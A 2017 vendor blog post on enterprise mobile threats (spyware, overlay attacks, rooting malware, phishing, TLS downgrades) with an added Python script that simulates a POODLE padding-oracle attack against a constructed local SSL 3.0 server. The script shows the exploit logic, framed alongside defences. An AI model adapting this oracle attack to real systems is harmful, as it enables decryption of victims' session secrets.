

July 13, 2017

Data compromise via mobile threats: Enterprises are facing complex attacks

By Andrew Blaich

[Figure: App-based threats data visual]

Mobile devices are essential to today's enterprise IT environment, making employees more productive and able to quickly monitor and address work issues from anywhere in the world. That same mobility also greatly increases the attack surface available to an attacker, and a single compromised device is a route to data compromise.

For example, 47 in 1,000 Android devices in the enterprise have encountered app-based threats in the past six months, according to recent Lookout research, and 1 in 1,000 iOS devices encountered an app-based threat in the same time frame.

In other words, for every thousand Android devices and every thousand iOS devices your company has, you can expect dozens of app-based threat encounters every single year, the large majority of them on Android.

"It only takes one compromised mobile device to allow an attacker to set up a damaging connection to your intellectual property and sensitive personally identifiable information (PII)."


When attackers come after your employees' mobile devices, their first goal is access. The mobile device is a highly valuable touchpoint that attackers know can either a) give them the information they want on first access or b) serve as a foothold from which to move laterally into the corporate network and reach deeper data.

It only takes one compromised mobile device to allow an attacker to set up a damaging connection to your intellectual property and sensitive personally identifiable information (PII). However, the mobile threat problem is more complicated than, for example, adware on the end-user device.

Mobile threats are complex operations that can touch all of the vectors on what we call the Mobile Risk Matrix, part of the larger Spectrum of Mobile Risk.

Mobile threats: not just an app anymore

The Mobile Risk Matrix covers a series of components of risk and the vectors through which data can be compromised on a mobile device. Threats are one component, and they touch multiple vectors: apps, devices, networks, and web and content.

Sophisticated threats don't just exploit one vector; often they use multiple vectors to carry out their mission.

For instance, the Pegasus spyware, which has targeted both iOS and Android devices, begins with an SMS phishing message, a social-engineering step that we classify as a web and content threat. Once a target received the message, a single tap on its link was enough to silently jailbreak or root the device, install the spyware, and give the attacker control over the phone's camera, microphone, and much else. This is where Pegasus touches the device vector. It could also track a victim's movements and read messages from end-to-end encrypted apps, not by breaking the encryption but by reading the messages on the device after the app had decrypted them.

Ultimately, attackers are looking for any way into an enterprise's systems, and they will regularly combine multiple vectors to be as successful as possible. An enterprise that does not account for all of the vectors when protecting against mobile threats leaves itself open to data compromise.

Here's a closer look at each of the vectors:  

App-based threats

App-based threats are the most prevalent of the vectors. There are multiple headlines every month about a newly discovered piece of Android malware that has been installed on millions of devices.

Enterprises need to be immediately aware of any surveillance threats and of other attempts to steal credentials. An app that arrives as adware may not stay adware: many app-based threats lie dormant on the device for a time and then escalate into something far more insidious, such as rooting the phone to spy on the user.

On average, Lookout has found that 3% of all app-based threat encounters on enterprise devices each quarter are surveillanceware. ViperRAT, for example, is a sophisticated and targeted threat that exfiltrates camera images and uses the device's microphone to record audio. It was aimed at members of the Israel Defense Forces, but surveillanceware of this kind is surprisingly common.

One common example is "spouseware," in which an individual installs malicious software on a partner's device. The target then brings the phone to work and accesses sensitive data, which the spouseware siphons off the phone. The larger problem is that criminals target the spyware vendors themselves, as in the FlexiSPY breach, knowing that they do not store the harvested data securely. Enterprise data first stolen by a jealous partner can therefore be taken a second time by a third party that does recognise the value of that corporate data.

Other threats, such as Acecard, use an "overlay attack," in which the malicious app draws a window on top of another app: either invisible, so that it captures what the user taps and types, or styled to look like the legitimate app's login screen, so that the user enters credentials directly into it. Acecard targeted financial applications and siphoned off login credentials. This is particularly concerning for single sign-on and two-factor authentication apps: an attacker who overlays a single sign-on service or a two-factor app instantly has nearly unrestricted access to corporate data.

"An attacker’s first goal is to get access. With one employee’s PII or credentials, an attacker is able to impersonate your employees, hijack accounts, and trick other employees into giving over sensitive corporate data."


Other malicious apps use social engineering to trick employees into "updating their app": the user uninstalls the real app and installs a malicious look-alike, which then steals the login credentials for that service.

Why should a security leader pay attention to any of this? An attacker's first goal is to get access. With one employee's PII or credentials, an attacker is able to impersonate your employees, hijack accounts, and trick other employees into giving over sensitive corporate data. Because the mobile device is a wealth of this kind of PII and credentials, it's a prime target for criminals.

Device-based threats

Device threats allow attackers to obtain unfettered access to the device and all its data by gaining higher levels of permission than are ordinarily granted to apps.

Auto-rooting malware such as LevelDropper is a threat that spans both the app and device vectors: a malicious app that, immediately and silently, exploits a software vulnerability in the device to gain OS-level control. Our research shows that on average, 10 out of 1,000 personal Android devices encounter an auto-rooting Trojan every year.

Once an attacker compromises a device, she can reach any app and any piece of data on it, encrypted or not. Pegasus, for example, had device-level access, so it could observe all activity on the infected phone and siphon off large quantities of sensitive information: every app must eventually decrypt its data to display it to the user, and at that moment a device-level implant can read it.

Attackers who compromise the device can also run much stealthier spying operations. An ordinary malicious app lacks device-level privileges, so it has to ask for permissions and may trigger visible prompts or indicators on the phone when it uses the camera, microphone, or other sensors. With a device compromise, an attacker can silently manipulate the smartphone without any indication to the user that something is wrong.

Network and web/content threats

Network threats exploit weaknesses in how websites and applications establish TLS/SSL sessions over Wi-Fi, cellular, or other networks, and in how they behave when the network itself is hostile. TLS downgrade attacks, in which an attacker on the path forces both ends to negotiate an older, weaker protocol version, are one significant example.

POODLE (CVE-2014-3566) is a good illustration. It is a flaw in the SSL 3.0 protocol itself rather than in any one library: SSL 3.0's CBC mode checks only the padding length byte and never the padding contents, which hands an attacker on the network a padding oracle. To reach it, the attacker first interferes with the handshake so that the mobile browser believes its attempt to connect with a newer TLS version has failed; the browser then retries with SSL 3.0, and the attacker can recover the encrypted data one byte at a time (a session cookie, for example, at roughly 256 forced requests per byte). Clients that refuse to fall back below TLS 1.0, servers that disable SSL 3.0, and the TLS_FALLBACK_SCSV signalling mechanism all close this path.
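The downgrade only gets the attacker onto SSL 3.0; what it then buys them is the padding oracle. The script below is an added example written for this page, not Lookout's code and not a real TLS implementation: a self-contained Python simulation of POODLE's decryption step. It assumes a stand-in 16-byte block cipher (a SHA-256 Feistel network, used only so that the script runs offline with the standard library; AES-CBC behaves identically for the attack), a truncated HMAC-SHA256 as the record MAC, a constructed secret cookie, and a "server" that, like SSL 3.0, validates only the padding length byte. The attacker never sees the key; it replays the victim's records with one ciphertext block moved into the padding slot and watches which ones the server accepts.

```python
# Added example (not from the article): POODLE-style padding-oracle decryption
# against SSL 3.0-style CBC records; cipher, key, secret and server are constructed.
import hashlib
import hmac
import os

BLOCK = 16                 # block size of the stand-in cipher
MAC_LEN = 16               # truncated HMAC-SHA256 tag
KEY = os.urandom(16)       # session key; the attacker never learns it
SECRET = b"tok3n!"         # constructed cookie the attacker wants to read


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    """Feistel round function: 8 bytes of SHA-256(key || round || half)."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, blk):
    """Stand-in 16-byte block cipher (4-round Feistel); AES would serve equally."""
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return r + l


def block_decrypt(key, blk):
    r, l = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)


def ssl3_seal(key, msg):
    """SSL 3.0 layout: msg || MAC || pad bytes || pad_len. The pad bytes are
    arbitrary and pad_len < BLOCK, so a full block of padding has pad_len 15."""
    body = msg + hmac.new(key, msg, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(key, iv, body)


def ssl3_open(key, iv, ct):
    """The oracle: True iff pad_len is sane AND the MAC verifies. Like SSL 3.0
    it never checks the padding bytes themselves, which is the whole bug."""
    plain = cbc_decrypt(key, iv, ct)
    pad_len = plain[-1]
    if pad_len >= BLOCK:
        return False
    body = plain[:len(plain) - pad_len - 1]
    msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    expect = hmac.new(key, msg, hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(tag, expect)


def victim_request(prefix_len, suffix_len):
    """The browser, driven by attacker JavaScript, re-sends a request whose
    path and body lengths the attacker picks; the secret cookie rides along."""
    return ssl3_seal(KEY, b"/" * prefix_len + SECRET + b"&" * suffix_len)


def poodle_recover(secret_len, max_tries=20000):
    """Recover the secret one byte at a time using only the accept/reject oracle."""
    recovered = bytearray()
    for k in range(secret_len):
        # Align byte k of the secret to the last byte of a block, and make the
        # record end in a full block of padding.
        prefix_len = BLOCK + (BLOCK - 1 - k) % BLOCK
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK
        target = (prefix_len + k) // BLOCK        # plaintext block holding byte k
        for _ in range(max_tries):
            iv, ct = victim_request(prefix_len, suffix_len)
            chain = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            # Replace the padding block with the target ciphertext block.
            forged = chain[1:-1] + [chain[target + 1]]
            if ssl3_open(KEY, iv, b"".join(forged)):
                # Accepted, so D(C_target)[15] ^ C_{n-1}[15] == 15 ...
                d_last = (BLOCK - 1) ^ chain[-2][-1]
                # ... and P_target[15] = D(C_target)[15] ^ C_{target-1}[15].
                recovered.append(d_last ^ chain[target][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; alignment is wrong")
    return bytes(recovered)


if __name__ == "__main__":
    print(poodle_recover(len(SECRET)))   # b'tok3n!'
```

Each byte costs about 256 forced requests, because the server accepts only when the moved block happens to decrypt to a last byte of 15 under that request's fresh IV. The same oracle does not exist against TLS 1.0 and later, which require every padding byte to carry the padding length, so a client that refuses to fall back to SSL 3.0 is immune even on a hostile network.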

"Web and content threats include phishing emails and text messages with links to malicious websites. This is one of the main vectors through which malicious software or other attacks happen on the device."


Web and content threats include phishing emails and text messages with links to malicious websites. This is one of the main vectors through which malicious software or other attacks reach the device. The classic SMS phishing message or email that tricks someone into handing over sensitive data is a tactic every security team has seen in its tenure, and it continues to work year after year.

Authentication tokens are also at risk. Some services still deliver two-factor codes to end-users over SMS. SMS travels in the clear over the carrier network and is a playground for eavesdroppers; anyone who can read the victim's messages, for example through a compromised device or network, can read the code too. Enterprise security teams should ensure that employees obtain two-factor codes from sanctioned authenticator apps, which compute the code on the device, rather than over SMS.

Protecting the future

The Mobile Risk Matrix gives enterprises a good starting point for evaluating their mobile environment. Each organization should ask: Have we addressed all of the risks on the matrix? If so, how confident are we that the controls we have in place are effective?

As mobile devices remain a key part of enterprise workflows, accessing sensitive corporate data daily from anywhere in the world, addressing mobile security is an ever more urgent enterprise need. The sooner you protect these devices against the entire spectrum of mobile risk, the better. It only takes one weak point in the Spectrum of Mobile Risk to put your corporation at risk.


Author

Andrew Blaich,
Manager - Vulnerability Research
